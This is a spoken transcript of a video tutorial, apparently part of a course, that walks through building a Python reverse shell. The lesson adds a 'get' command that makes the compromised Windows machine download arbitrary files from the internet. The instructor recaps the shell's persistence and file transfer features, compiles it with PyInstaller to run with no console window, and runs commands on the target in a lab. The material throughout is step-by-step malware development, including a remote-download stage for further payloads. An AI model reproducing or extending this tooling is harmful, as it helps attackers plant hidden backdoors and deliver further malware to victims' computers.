Hello everybody and welcome back. And right now let us actually start adding some additional functions to our reverse shell. We made a fully functioning reverse shell that can both execute commands, that can change directory, that can make a persistence and run every 20 seconds in order to perform a connection. We also created a function that can actually download and upload files, and right now let us create something, or basically another option for our reverse shell that can download the files from the internet. Now, what I mean by that is that you should actually differentiate the download function that we used in order to download files from the target PC and the download function that we will code right now, which will be used in order to download any file from the internet. So all we need to specify is actually download command, or basically download and then the URL, and then we should receive whether the download function worked well or not. Now it might be a little bit confusing at the start, but I will show you right now. What we want to do is import a library first, and then we will code a simple download function which will take an URL as input, and it will write the contents on target PC. So for example, I will run a file on my Apache 2 web server on my laptop, and we will try to perform or basically we will try to add a function to our reverse shell that will download that file from the Apache 2 web server on my laptop to the Windows 10 machine. So first of all, let me go to my laptop, and right now I have a file called shell.exe. But right now I will make it a text file so we can actually recognize it once we download it. So I will remove the shell.txt. You can see what I'm doing since I'm on my laptop, but I will just make a file on my Apache 2 web server called test.txt. In that file it will say this is our secret backdoor. So if we manage to actually make our Windows 10 download a function from a third PC, which is our laptop, that will be great. That means that we can also download the files from any other website. For example, if you wanted to, you could download a WinRAR to the target PC. Not really sure why you would need to do that, but you can do it if you want to. So let's get started. Just let me close the PC right here. And right now what we want to do is open up our reverse shell first of all, since we will be coding it first. After that we will also need to add the function to the target, or pardon me, to the server. And what we want to do right now is go to the shell part, so shell function right here, and we want to add another elif statement. But since we want to differentiate it from the previous one, which was the download, which we used to download the files from target PC, right now we want to make it a little bit different so the command isn't the same, otherwise our program will break. Let's call it the get command. So every time you specify get and then the URL in server, the target will download the file from the URL. So let us type here else if command, and then this right here, so 3. We use 3 because get only has 3 letters. And then we specify equals get. We want to first of all always try to run the try and except rule, since we don't want our program to break. So all we have to do right now is let's first of all try to execute the download, and we will do that with the download function that I will code in the upper part of the code. But right now let's just call it download. We still don't have it, but we will code it. So download, and what we want to download is the file from the URL. So what we want to paste to this function as a input in the brackets will be the URL, but the URL will always be the command, and then basically the command cut from the 4th letter. So command 4 and then 2 dots. Now why I say from the 4th letter, so let me just type it right here. If the server types in this command, so http for example, then 2 slashes, and then basically some IP address, I don't even know, it will look something like this, and then the test.txt. Then we will paste this part right here, to the download function, which will perform the download of this test.txt file. Now this can be linked to any website as well, so I don't know, Google, and then for example let's imagine that Google had a directory with the test.txt file. You will be able to download it with this command. So since we won't get any output once the target downloads the file, we want to send ourselves from the target to the server that the download finished successfully. And how we will do that? We will do that basically with reliable send, and what we will send is just a simple string. So let's code it like this with a plus, so it means it executed correctly. Downloaded file from specify URL, and let's add an exclamation mark. So this will mean that we actually successfully downloaded the file. Now in the accept rule, we want to specify another reliable send, so reliable send, two exclamation marks, failed to download file. And we also need to specify it as a string right here, so our program doesn't crash. And right now this is what we will have in the else if statement, and all we have to do right now is code the download function. Since this download function doesn't really exist, we have to code it ourselves, and we will do it right now. So go to the upper part of the code, and wherever you want you can add the download function, which we will code right now. I will add it after the reliable receive, so I will add some spaces right here, and then I will def download, which will take as an input a URL, which is specified also in the else statement. Now, in order for us to be able to download this, we need to use a library which is called requests library. So go up to the upper part of the code and import library called requests. After you import the library called requests, we're good to go, and we can actually code our function right now, which is rather short. So we will type it like this, so get response. Now we use the get response since we are actually getting that URL. We want to get that file from that URL, and we will use a function in the requests library called requests.get, and we specify the URL. This will get all the contents from the URL file, which we specified in the download function, so it will use the same URL in this function as well. It will give it to this variable right here that we named it getResponse. Then we want to specify the file to where it should write the file that it downloads, so the file name underscore name, let's call it like that, equals, and the file name should be the basically the last part of the URL. So if we for example have the, let me just type it right here once again, so this URL http://192.168.1.15/test.txt. We only want to name the file the last part of the URL, so we do not want to name it the entire URL. So in order for us to do that, we can do something like this. URL, which is this basically that will go into the function, .split, this is a function we can use, and then we want to split it on the last slash, so just specify slash in the brackets, and then this squarey brackets -1. This means it will split the URL every time it has these slashes, and then it will use as a file name the last part, or basically the last string before the last slash. So we will only select this part right here, which is what we want. So let me delete this since it is not a part of the code, and let us continue with this. So we made the variable which will get the file. We also made the file name which will contain the name of the file that we are downloading. All we have to do right now is write the contents of this variable to our file. So we do that. We open a file first, so with open file name. This means that it will open this file name as the name of the file. We want to write bytes since we are on our reverse shell.py, which means we want to download to the target the files, and let's write it as out_file. This is just the name of our file that we will write, and right now we want to write the contents of the file that we downloaded. So let us do that, out file.write, and then we write the get response, and we use the function in the requests called content. And this is the entire function. Basically, this is all we need to do on our reverse-shell.py in order to perform the download on the target system. So every time we on server send the command get and then space and then URL, it will download that file from the URL. So let us Control O this, and let us go to the server to see if we need to code anything so it doesn't crash. So let us nano the server.py. And basically let us think about it first. So if we send the get command right here, let me just think about it. So if we send the get command and then we download that file, we will be receiving if the file coded successfully, if the file downloaded successfully, or if the file failed to download. So we really don't need to code anything right here, since we will send the command and it will go to this statement right here, which is the last one, which it goes always to here when none of these statements is fulfilled. So it will go to here, it will wait for the reliable receive, and it will print the result. And our result in this case will be if that will be that string, whether the file downloaded successfully or it didn't. So we actually don't need to code anything right here. So let us save this. We didn't change anything right here. And let us actually compile our program. So let us go to the wine, root.wine, and then we go drive C, Python 27, PyInstaller, scripts, pardon me, we need scripts first, PyInstaller.exe, and then the name of the file, which is reverse shell. We want to use one file, and then no console. So we let this compile in valid syntax. So we need to, let me just first delete this. We have a syntax that is not valid, so let me just delete this since it didn't compile well enough. So we have the syntax in the elif command equals get. So we forgot to add the two dots after the get. So let us find where that is, right here. We need to add this right here. So right now let us try once again. Let us try to compile the file again. It seems to be working now, so I believe there are no more syntax errors in the reverse shell. And let's see if it will work. So completed successfully, good. Right now, before we actually continue, let me just show you what file we will be downloading. So if I go right here to the Firefox, open up the Firefox, so visit my Apache 2 web server on my laptop, there should be a test.txt file. So let's type in the IP address on my laptop. Just delete this first. So .192.168.1.15. And here you can see we have a test.txt file. So if we specified, for example, / and then test.txt once again, you can see that this is our secret backdoor. This is the file that we will try to download from our laptop on our Windows 10 machine. So let us close this. Right now what we want to do is clear the screen, go to the dist, since there is our executable, standardly plug in our USB drive, and then copy the executable to the USB drive. So ls, move reverse-shell.exe to the root media, is it media? I wanted to tab it. Let me just check it once again. So move root media. Can't seem to find the media, so let us, maybe I specified something wrong. Let me just check it out right here. We just go right here and see if the file, if we successfully plugged in the USB drive. So let's wait for this to open, Kali Live. It's right here. So let me first of all open the terminal to see in which directory. Oh, it's media root. So okay, let's first of all delete the previous one, exit this terminal, and what I specified wrong is basically I specified this difference. So what I need to do is move to the media and then root and then the name of our Kali Linux drive. But I need to move our reverse shell, so I can't move nothing. So media, root, and then to our USB drive we move the executable. Then we can close this and also close the USB. We can enlarge this and we can run our server.py. Just run this first. So this is running, this is task manager, and what I need is basically this. So what I want to do is copy the reverse shell right here, run it, and we get failed to execute script the reverse shell. Now this can be from two reasons. Either we specified something wrong in the file, or our Pi installer doesn't have the requests library installed in it. So in order for us to fix that, first what we need to do is close our program. So we close the program. Then what we need to do is run a simple wine command in order for our Python 27 that is installed in the wine folder to have the requests library. So let us see how we can do that. We can do that with this command. So wine, then we specify the path to the Python in our drive C folder, so Python 27, and then python.exe, which is the executable for Windows that we installed. Then we need to specify -m and then pip install requests. I believe that was the name of the library. If it's not, I will have to check it out. Once you click here enter, it should install the requests library for our python.exe file in our root, or basically in our wine drive C folder. So we can see collecting requests. This shouldn't take more than a few seconds. Now you will have to do this for every library that the python.exe doesn't support on the wine folder. So we'll have to download all of these libraries that we will import later on in order to make your program work on Windows machines. So we can see everything works successfully. So we have the request library installed. So let us compile once again. Let us first delete the previous one. So rm dist -r, rm build -r, rm reverse shell spec. Then let us find the compilation command. Here it is. We want to compile it once again. And while it's compiling, let us delete the file from the reverse shell, or from the USB drive. And let's try to run this once again. I believe now it should work. So everything is compiled successfully, and right now if we plug in the USB drive, plug it in, clear this, go to dist, and then we want to, I didn't want to open that, I just want to move the file, so let me just wait for this so I can close it. Okay, we want to move the reverse shell to the media, root, and then Kali Live. We move the file, we go one directory back, and we run the server. Address already in used. Let's restart the terminal. Once you get that the address already is used, you need to restart your terminal and all will work good. So zoom in, cd python reverse, run the server, and listening for incoming connections. All we have to do is run our reverse shell right now. So continue without scanning, paste it right here. Oh, we already have this, so let's delete this, and right now paste the file and run it. As we can see right now, we are not getting any error, so our reverse shell executed successfully, and we should actually receive the shell prompt right here in a few seconds. Then we can try to execute the get command that we actually coded in this video. So here it is. We check it with simple dir command, so everything works good. Whoami works good, arp -a, all commands work good. So right now, let's try to download the test.txt file from our laptop. So get http /192.168.1.15/test.txt. Now let me just see if I don't already have something called test.txt, I have the test folder. So right now, if I press enter right here, we got the string downloaded file from specified URL. So let's see if it really did. We have the test.txt, and if we downloaded it good, we have this is our secret backdoor. Good. So right now let's also try to download another file that isn't on our laptop, so you can see that basically any file will be able to be downloaded in our on our Windows 10 machine. So let's try to find download WinRAR, for example. You can try to download any other file if you want to. Let's go and find any website where we can download it. WinRAR download and support. Let's click on there. It doesn't even matter which version are we running. All we have to do, download WinRAR, click right here. Let me just see from https://winrar.com, and all we have to do is type here this link, I believe, and then this path right here. But since this is actually downloading it for Linux, I do not want to do that. So what we want to do, let me just see the version of it. So download WinRAR, or we can actually go on our Windows 10 machine and try to find the link. So if I go to my Windows 10 machine, go to the WinRAR, download WinRAR, it will start downloading it. So we can see that the exe right here worked. So let us specify the name and see if this is really the link. So WinRAR -x64 -570.exe. If I just type right here, well, it doesn't seem to be that command, so click for 64-bit. It doesn't even matter, basically, once you find the link. This WinRAR right here is kind of giving us a little bit of problems right now, but it doesn't matter. What you can do is just find the link through your burp suite, and then after you find the link to your burp suite, you can download any file to the target PC from the internet. So you can try that out, play with it if you want to. It should work, and that would be about it for this tutorial. It was a rather longer tutorial, and we will continue in the next section through adding more functions for our reverse shell. Hope I see you there, and take care. Bye.